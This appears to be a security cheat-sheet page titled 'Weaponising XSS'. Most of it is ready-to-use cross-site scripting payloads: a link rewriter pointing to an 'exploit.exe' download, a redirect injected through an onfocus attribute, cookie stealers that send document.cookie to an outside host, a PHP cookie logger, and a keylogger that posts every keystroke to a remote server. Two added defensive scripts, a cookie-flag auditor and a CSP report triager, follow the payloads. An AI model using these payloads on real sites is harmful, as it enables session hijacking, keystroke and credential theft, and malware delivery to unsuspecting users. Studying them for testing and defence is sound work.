Weaponising XSS

1-up your <script>alert(1)</script> and effectively demonstrate risk

Content substitution

Replace Link

Replace all links on the page with your link

for (var i = 0; i < document.links.length; i++) {
  var a = document.links[i];
  a.href = 'https://domain.com/exploit.exe';
}

Replace HTML element

Replace HTML elements with your custom content using the Element.innerHTML property. The example below replaces the entire body element.

document.body.innerHTML = 'New body HTML';

Forward traffic

Simply forward traffic to your own site

location.replace("https://domain.com")

Example use in an "input" field (injected as attributes of the element):

onfocus=location.replace("https://domain.com") autofocus=a

Data Exfiltration

Cookie stealers

Simple cookie stealers

document.location cookie stealer

<script type="text/javascript">
document.location='https://domain.com/cookiestealer.php?c='+document.cookie;
</script>

img src cookie stealer

<img src=x onerror=this.src='https://domain.com/?c='+document.cookie>

PHP server to log the received cookies

<?php
// Send the visitor on to a redirect target, then append the received cookie string to a log file
header('Location: https://redirect-domain.com');
$cookies = $_GET["c"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookies . "\n\n\n");
fclose($file);
?>

JavaScript cookie stealer (could be paired with the key logger below)

Three exfiltration methods are included below; use only one

function ajaxRequest (method, url, data, ad) {
  var xmlHttp = new XMLHttpRequest()

  if (xmlHttp.overrideMimeType) {
    xmlHttp.overrideMimeType('text/plain; charset=x-user-defined')
  }

  xmlHttp.open(method, url, true)

  if (ad) {
    xmlHttp.onreadystatechange = function () {
      if (xmlHttp.readyState === 4) {
        ad(xmlHttp)
      }
    }
  }

  xmlHttp.send(data)
  return xmlHttp
}

var CookieExfil = function () {} // no-op completion callback passed to ajaxRequest
var c = document.cookie
//Include one of the three exfil methods below:
//GET request - AJAX
ajaxRequest('GET', 'https://domain.com?c=' + encodeURIComponent(c), undefined, CookieExfil)

//GET request - DOM (image beacon)
var i = new Image()
i.src = 'https://domain.com?c=' + encodeURIComponent(c)
CookieExfil()

//POST request - AJAX
ajaxRequest('POST', 'https://domain.com', 'cookie=' + encodeURIComponent(c), CookieExfil)
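Every stealer above starts from `document.cookie`, and that call only returns cookies set without the `HttpOnly` flag. The following is an added example, not code from the original page, that audits `Set-Cookie` headers the way a reviewer would: it parses each header, reports which cookies a script on the page could read, and lists the missing flags. The parser, the `auditCookies` findings and the sample headers are constructed for the example; it runs under Node.js.

```javascript
// Added example, not from the original page: audit Set-Cookie headers for the
// flags that decide what the cookie stealers above can reach. document.cookie
// exposes only cookies set WITHOUT HttpOnly, so an HttpOnly session cookie never
// appears in `c`. Secure and SameSite do not stop theft through XSS, but they
// limit where a stolen or forged cookie can be replayed.

// Parse one Set-Cookie header value into its name, value and security flags.
function parseSetCookie(headerValue) {
  const parts = headerValue.split(';').map((p) => p.trim()).filter((p) => p.length > 0);
  const eq = parts[0].indexOf('=');
  const cookie = {
    name: eq === -1 ? parts[0] : parts[0].slice(0, eq),
    value: eq === -1 ? '' : parts[0].slice(eq + 1),
    httpOnly: false,
    secure: false,
    sameSite: null // 'Strict', 'Lax', 'None', or null when the attribute is absent
  };
  for (const attr of parts.slice(1)) {
    const [attrName, attrValue] = attr.split('=');
    switch (attrName.trim().toLowerCase()) {
      case 'httponly': cookie.httpOnly = true; break;
      case 'secure': cookie.secure = true; break;
      case 'samesite': cookie.sameSite = (attrValue || '').trim(); break;
      default: break; // Path, Domain, Expires and Max-Age are not relevant to this audit
    }
  }
  return cookie;
}

// Names of the cookies a script running on the page would see in document.cookie.
function scriptReadable(cookies) {
  return cookies.filter((c) => !c.httpOnly).map((c) => c.name);
}

// Findings a reviewer would raise for each cookie. A script-readable CSRF token
// can be deliberate (double-submit pattern), so findings are for human review.
function auditCookies(cookies) {
  const findings = [];
  for (const c of cookies) {
    if (!c.httpOnly) findings.push(c.name + ': missing HttpOnly, readable via document.cookie');
    if (!c.secure) findings.push(c.name + ': missing Secure, sent over plain HTTP');
    if (c.sameSite === null) findings.push(c.name + ': missing SameSite');
  }
  return findings;
}

// Constructed sample headers; the values are placeholders, not real tokens.
const sampleHeaders = [
  'sessionid=CONSTRUCTED_SESSION; Path=/; HttpOnly; Secure; SameSite=Lax',
  'csrftoken=CONSTRUCTED_TOKEN; Path=/; Secure; SameSite=Strict',
  'theme=dark; Path=/'
];

function auditSampleHeaders() {
  const cookies = sampleHeaders.map(parseSetCookie);
  return { readable: scriptReadable(cookies), findings: auditCookies(cookies) };
}

console.log(JSON.stringify(auditSampleHeaders(), null, 2));
```

With the sample headers, only `csrftoken` and `theme` would be present in `c`; the `sessionid` cookie is never exposed to the payloads on this page, which is why `HttpOnly` on session cookies is the first thing to check when assessing the impact of an XSS finding.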

Key logger

Log keystrokes to the attacker's remote server

function ajaxRequest (method, url, data, ad) {
  var xmlHttp = new XMLHttpRequest()

  if (xmlHttp.overrideMimeType) {
    xmlHttp.overrideMimeType('text/plain; charset=x-user-defined')
  }

  xmlHttp.open(method, url, true)

  if (ad) {
    xmlHttp.onreadystatechange = function () {
      if (xmlHttp.readyState === 4) {
        ad(xmlHttp)
      }
    }
  }

  xmlHttp.send(data)
  return xmlHttp
}

document.addEventListener('keypress', function (e) {
  ajaxRequest('POST', 'https://domain.com/Log', 'key=' + encodeURIComponent(e.key))
})
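Both the cookie stealers and the key logger move data off the page through an image request or an `XMLHttpRequest` to a host the application does not own, which is exactly what a Content Security Policy with `img-src` and `connect-src` restrictions refuses and, with `report-uri`, reports. The following is an added example, not code from the original page, that triages a batch of CSP violation reports and separates the ones consistent with exfiltration from routine noise. The trusted host list, the severity rules and the sample reports are constructed for the example; it runs under Node.js.

```javascript
// Added example, not from the original page: triaging CSP violation reports.
// A policy such as
//   default-src 'self'; img-src 'self'; connect-src 'self'; report-uri /csp-report
// makes the browser refuse the image beacon and the XMLHttpRequest used above and
// POST a JSON report for each refused request. This separates reports that look
// like data leaving the page from routine noise (extensions, our own asset hosts).

// Constructed: hosts that legitimately serve the defended application.
const TRUSTED_HOSTS = new Set(['www.example.org', 'static.example.org']);
// Directives through which the payloads above move data off the page.
const EXFIL_DIRECTIVES = new Set(['img-src', 'connect-src', 'form-action']);

// Hostname of a blocked-uri, or null for the non-URL values browsers report
// ('inline', 'eval', '' and similar).
function hostOf(uri) {
  try {
    return new URL(uri).hostname;
  } catch (e) {
    return null;
  }
}

// Classify one report. The report-uri format wraps the fields in
// {"csp-report": {...}}; a bare body is accepted too.
function triageReport(report) {
  const body = report['csp-report'] || report;
  const directive = String(body['effective-directive'] || body['violated-directive'] || '').split(' ')[0];
  const blocked = String(body['blocked-uri'] || '');
  const page = body['document-uri'];
  const host = hostOf(blocked);

  if (/^(chrome|moz|safari)-extension/.test(blocked)) {
    return { severity: 'info', reason: 'browser extension', page };
  }
  if (directive === 'script-src' && (blocked === 'inline' || blocked === 'eval')) {
    // The injected script itself was refused before it could run.
    return { severity: 'medium', reason: 'inline or eval script refused', page };
  }
  if (EXFIL_DIRECTIVES.has(directive) && host !== null && !TRUSTED_HOSTS.has(host)) {
    return { severity: 'high', reason: directive + ' to untrusted host ' + host, page };
  }
  return { severity: 'low', reason: 'violation involving a trusted or unknown source', page };
}

// Tally a batch of reports and collect the high-severity ones for follow-up.
function summarizeReports(reports) {
  const counts = { high: 0, medium: 0, low: 0, info: 0 };
  const high = [];
  for (const r of reports) {
    const t = triageReport(r);
    counts[t.severity] += 1;
    if (t.severity === 'high') high.push(t);
  }
  return { counts, high };
}

// Constructed sample reports in the report-uri shape; hosts and values are placeholders.
const SAMPLE_REPORTS = [
  { 'csp-report': { 'document-uri': 'https://www.example.org/profile', 'effective-directive': 'img-src',
      'violated-directive': "img-src 'self'", 'blocked-uri': 'https://collector.invalid/?c=sessionid%3DCONSTRUCTED' } },
  { 'csp-report': { 'document-uri': 'https://www.example.org/profile', 'effective-directive': 'connect-src',
      'violated-directive': "connect-src 'self'", 'blocked-uri': 'https://collector.invalid/Log' } },
  { 'csp-report': { 'document-uri': 'https://www.example.org/search?q=x', 'effective-directive': 'script-src',
      'violated-directive': "script-src 'self'", 'blocked-uri': 'inline' } },
  { 'csp-report': { 'document-uri': 'https://www.example.org/', 'effective-directive': 'img-src',
      'violated-directive': "img-src 'self'", 'blocked-uri': 'https://static.example.org/logo.png' } },
  { 'csp-report': { 'document-uri': 'https://www.example.org/', 'effective-directive': 'script-src',
      'violated-directive': "script-src 'self'", 'blocked-uri': 'chrome-extension' } }
];

console.log(JSON.stringify(summarizeReports(SAMPLE_REPORTS), null, 2));
```

Two high-severity reports from the same `document-uri` pointing at one unknown host is the signal worth paging on: it usually means a payload like the ones on this page is executing on a real page and the policy is the only thing stopping it from succeeding. The `medium` inline-script reports from the same page tell you where the injection point is.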

Last updated 5 years ago
